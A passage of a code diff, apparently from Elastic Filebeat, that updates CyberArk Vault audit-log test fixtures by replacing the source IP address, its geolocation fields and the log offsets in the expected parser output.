+<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:36","IsoTimestamp":"2021-03-10T09:11:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAGWAccounts","TargetUser":"","Safe":"PSMPADBUserProfile","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:37Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:37","IsoTimestamp":"2021-03-10T09:11:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"PSMPADBridgeConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:38Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:38","IsoTimestamp":"2021-03-10T09:11:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"PSMPADBridgeCustom","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T17:59:32Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:32","IsoTimestamp":"2021-03-10T17:59:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/32_add_owner.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/32_add_owner.log-expected.json
index 8cff9f6ba312..9ec595836948 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/32_add_owner.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/32_add_owner.log-expected.json
@@ -10,7 +10,7 @@
 "cyberarkpas.audit.safe": "PSMPConf",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "Master",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
 "event.action": "add owner",
 "event.category": [
@@ -37,23 +37,20 @@
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "Master"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -72,7 +69,7 @@
 "cyberarkpas.audit.safe": "PSMPConf",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "Administrator",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
 "event.action": "add owner",
 "event.category": [
@@ -92,29 +89,26 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 568,
+ "log.offset": 567,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -133,7 +127,7 @@
 "cyberarkpas.audit.safe": "PSMPConf",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "Batch",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
 "event.action": "add owner",
 "event.category": [
@@ -153,30 +147,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 1143,
+ "log.offset": 1141,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "Batch"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -195,7 +186,7 @@
 "cyberarkpas.audit.safe": "PSMPConf",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "Operators",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
 "event.action": "add owner",
 "event.category": [
@@ -215,30 +206,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 1710,
+ "log.offset": 1707,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "Operators"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -257,7 +245,7 @@
 "cyberarkpas.audit.safe": "PSMPConf",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "Backup Users",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
 "event.action": "add owner",
 "event.category": [
@@ -277,30 +265,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 2281,
+ "log.offset": 2277,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "Backup Users"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -319,7 +304,7 @@
 "cyberarkpas.audit.safe": "PSMPConf",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "Auditors",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
 "event.action": "add owner",
 "event.category": [
@@ -339,30 +324,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 2855,
+ "log.offset": 2850,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "Auditors"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -381,7 +363,7 @@
 "cyberarkpas.audit.safe": "PSMPConf",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "DR Users",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
 "event.action": "add owner",
 "event.category": [
@@ -401,30 +383,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 3425,
+ "log.offset": 3419,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "DR Users"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -443,7 +422,7 @@
 "cyberarkpas.audit.safe": "PSMPConf",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "Notification Engines",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
 "event.action": "add owner",
 "event.category": [
@@ -463,30 +442,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 3995,
+ "log.offset": 3988,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "Notification Engines"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -505,7 +481,7 @@
 "cyberarkpas.audit.safe": "PVWAConfig",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMPApp_localhost.localdomain",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:22",
 "event.action": "add owner",
 "event.category": [
@@ -525,30 +501,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 4577,
+ "log.offset": 4569,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "PSMPApp_localhost.localdomain"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -567,7 +540,7 @@
 "cyberarkpas.audit.safe": "PSMPLiveSessions",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMAppUsers",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:23",
 "event.action": "add owner",
 "event.category": [
@@ -587,30 +560,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 5170,
+ "log.offset": 5161,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "PSMAppUsers"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -629,7 +599,7 @@
 "cyberarkpas.audit.safe": "PSMPConf",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "Vault Admins",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:23",
 "event.action": "add owner",
 "event.category": [
@@ -649,30 +619,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 5751,
+ "log.offset": 5741,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "Vault Admins"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -691,7 +658,7 @@
 "cyberarkpas.audit.safe": "PSMPLiveSessions",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PVWAAppUsers",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:23",
 "event.action": "add owner",
 "event.category": [
@@ -711,30 +678,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 6325,
+ "log.offset": 6314,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "PVWAAppUsers"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -753,7 +717,7 @@
 "cyberarkpas.audit.safe": "PSMPADBUserProfile",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PVWAGWAccounts",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:36",
 "event.action": "add owner",
 "event.category": [
@@ -773,30 +737,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 6907,
+ "log.offset": 6895,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "PVWAGWAccounts"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -815,7 +776,7 @@
 "cyberarkpas.audit.safe": "PSMPADBridgeConf",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMP_ADB_localhost.localdomain",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:37",
 "event.action": "add owner",
 "event.category": [
@@ -835,30 +796,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 7493,
+ "log.offset": 7480,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "PSMP_ADB_localhost.localdomain"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -877,7 +835,7 @@
 "cyberarkpas.audit.safe": "PSMPADBridgeCustom",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMP_ADB_AppUsers",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:38",
 "event.action": "add owner",
 "event.category": [
@@ -897,30 +855,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 8093,
+ "log.offset": 8079,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "PSMP_ADB_AppUsers"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -939,7 +894,7 @@
 "cyberarkpas.audit.safe": "PVWAConfig",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMApp_VAGRANT",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 09:59:32",
 "event.action": "add owner",
 "event.category": [
@@ -959,30 +914,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 8682,
+ "log.offset": 8667,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "PSMApp_VAGRANT"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/33_update_owner.log b/x-pack/filebeat/module/cyberarkpas/audit/test/33_update_owner.log
index 16ec40c4f3c5..0360bee64592 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/33_update_owner.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/33_update_owner.log
